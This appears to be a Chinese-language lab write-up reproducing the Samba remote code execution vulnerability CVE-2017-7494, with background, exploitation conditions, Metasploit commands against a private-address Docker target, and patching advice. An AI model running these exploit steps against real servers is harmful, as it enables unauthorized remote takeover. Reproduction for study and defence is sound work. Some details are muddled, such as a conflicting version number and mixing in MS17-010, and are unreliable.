linux Samba遠端程式碼執行漏洞(CVE-2017-7494)復現
一、漏洞介紹
Samba實現Windows主機與Linux伺服器之間的資源共享,Linux作業系統提供了Samba服務,Samba服務為兩種不同的作業系統架起了一座橋樑,使Linux系統和Windows系統之間能夠實現互相通訊。samba在linux系統上實現SMB協議的服務,使用SMB協議在區域網上共享檔案和印表機.CVE-2017-7494,2017年5月24日Samba釋出了4.6.4版本,修復嚴重的遠端程式碼執行漏洞,該漏洞影響了Samba 3.5.0 之後到4.6.4/4.5.10/4.4.14中間的所有版本,可以讓惡意訪問者遠端控制受影響的Linux和Unix機器。
二、主要影響版本
1、MS17-010方程式“永恆之藍”
WannaCry勒索蠕蟲,影響Windows xp 到Windows server 2012
2、CVE-2017-7494 Linux版本“永恆之藍”遠端程式碼執行漏洞
Samba 3.5.0-4.6.4/4.5.1/4.4.14中間的所有版本
三、漏洞利用條件
1、部署了存在漏洞的samba版本,並且對外網開放445埠;
2、匿名訪問使用者對共享檔案有可寫許可權;(許可權控制很重要)
3、需要知道共享目錄的物理路徑。
四、漏洞危害及常見攻擊方式
1、獲取伺服器或個人pc的許可權;
2、攻擊者常使用滲透測試工具metersploit中的exp進行攻擊。
五、漏洞復現
1、復現環境:
安裝了docker的Ubuntu伺服器:192.168.4.128
攻擊機(kali):192.168.4.157
2.步驟:
開啟docker環境
sudo docker-compose up -d
sudo docker ps //檢視漏洞環境開啟情況
msfconsole
use use exploit/linux/samba/is_known_pipename
show options
set rhost 192.168.4.128
set SMB_FOLDER /home/share
show options
這裡出現了加密錯誤,需要通過不加密來進行exploit
set SMB::AlwaysEncrypt false //設定SMB總是不加密
set SMB::ProtocolVersion 1 //設定協議版本為Version 1
exploit
六、漏洞修復建議
1、安裝ms17-010不定或升級samba版本到4.6.4
2、對外閘道器閉445埠